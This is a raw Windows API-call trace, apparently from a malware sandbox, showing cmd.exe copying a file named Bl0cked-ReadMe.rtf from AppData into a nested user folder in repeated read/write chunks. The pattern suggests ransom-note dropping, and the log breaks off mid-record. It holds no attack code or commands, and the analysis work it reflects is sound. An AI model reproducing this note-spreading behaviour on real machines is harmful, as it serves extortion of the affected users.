[0140.042] GetUserDefaultLCID () returned 0x409 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afbf8, cchData=128 | out: lpLCData="0") returned 2 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afbf8, cchData=128 | out: lpLCData="0") returned 2 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afbf8, cchData=128 | out: lpLCData="1") returned 2 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.042] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.043] GetConsoleTitleW (in: lpConsoleTitle=0x350918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.043] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.043] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.043] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.044] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.044] _wcsicmp (_String1="type", _String2=")") returned 75 [0140.044] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0140.044] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0140.044] _wcsicmp (_String1="IF", _String2="type") returned -11 [0140.044] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0140.044] _wcsicmp (_String1="REM", _String2="type") returned -2 [0140.044] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0140.049] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.049] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.049] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.049] GetFileType (hFile=0x7) returned 0x2 [0140.049] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.050] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2afaf0 | out: lpMode=0x2afaf0) returned 1 [0140.050] _dup (_FileHandle=1) returned 3 [0140.050] _close (_FileHandle=1) returned 0 [0140.050] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0140.050] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2afac0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0140.052] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0140.052] GetConsoleTitleW (in: lpConsoleTitle=0x2af8f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.053] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0140.053] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0140.053] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0140.053] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0140.053] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.053] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2af454, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af454) returned 0x350ee0 [0140.054] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0140.054] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0140.054] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0140.054] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ae360, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0140.054] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0140.054] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.054] GetFileType (hFile=0x54) returned 0x1 [0140.054] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.054] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ae3b8 | out: lpFileSizeHigh=0x2ae3b8*=0x0) returned 0x1632 [0140.054] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.054] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.054] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.054] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.055] GetFileType (hFile=0x4c) returned 0x1 [0140.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.055] GetFileType (hFile=0x4c) returned 0x1 [0140.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.055] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.056] GetFileType (hFile=0x4c) returned 0x1 [0140.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.056] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.056] GetFileType (hFile=0x4c) returned 0x1 [0140.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] GetFileType (hFile=0x4c) returned 0x1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] GetFileType (hFile=0x4c) returned 0x1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] GetFileType (hFile=0x4c) returned 0x1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] GetFileType (hFile=0x4c) returned 0x1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.057] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.057] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.057] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.057] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] GetFileType (hFile=0x4c) returned 0x1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] GetFileType (hFile=0x4c) returned 0x1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] GetFileType (hFile=0x4c) returned 0x1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] GetFileType (hFile=0x4c) returned 0x1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] GetFileType (hFile=0x4c) returned 0x1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] GetFileType (hFile=0x4c) returned 0x1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] GetFileType (hFile=0x4c) returned 0x1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] GetFileType (hFile=0x4c) returned 0x1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.058] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.058] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.058] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.058] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] GetFileType (hFile=0x4c) returned 0x1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] GetFileType (hFile=0x4c) returned 0x1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] GetFileType (hFile=0x4c) returned 0x1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] GetFileType (hFile=0x4c) returned 0x1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] GetFileType (hFile=0x4c) returned 0x1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] GetFileType (hFile=0x4c) returned 0x1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] GetFileType (hFile=0x4c) returned 0x1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] GetFileType (hFile=0x4c) returned 0x1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.059] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.059] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.059] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.059] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] GetFileType (hFile=0x4c) returned 0x1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] GetFileType (hFile=0x4c) returned 0x1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] GetFileType (hFile=0x4c) returned 0x1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] GetFileType (hFile=0x4c) returned 0x1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] GetFileType (hFile=0x4c) returned 0x1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] GetFileType (hFile=0x4c) returned 0x1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] GetFileType (hFile=0x4c) returned 0x1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] GetFileType (hFile=0x4c) returned 0x1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.060] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.060] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.060] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.060] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] GetFileType (hFile=0x4c) returned 0x1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] GetFileType (hFile=0x4c) returned 0x1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] GetFileType (hFile=0x4c) returned 0x1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] GetFileType (hFile=0x4c) returned 0x1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] GetFileType (hFile=0x4c) returned 0x1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] GetFileType (hFile=0x4c) returned 0x1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] GetFileType (hFile=0x4c) returned 0x1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] GetFileType (hFile=0x4c) returned 0x1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.061] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.062] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.062] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.062] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] GetFileType (hFile=0x4c) returned 0x1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] GetFileType (hFile=0x4c) returned 0x1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] GetFileType (hFile=0x4c) returned 0x1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] GetFileType (hFile=0x4c) returned 0x1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] GetFileType (hFile=0x4c) returned 0x1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: 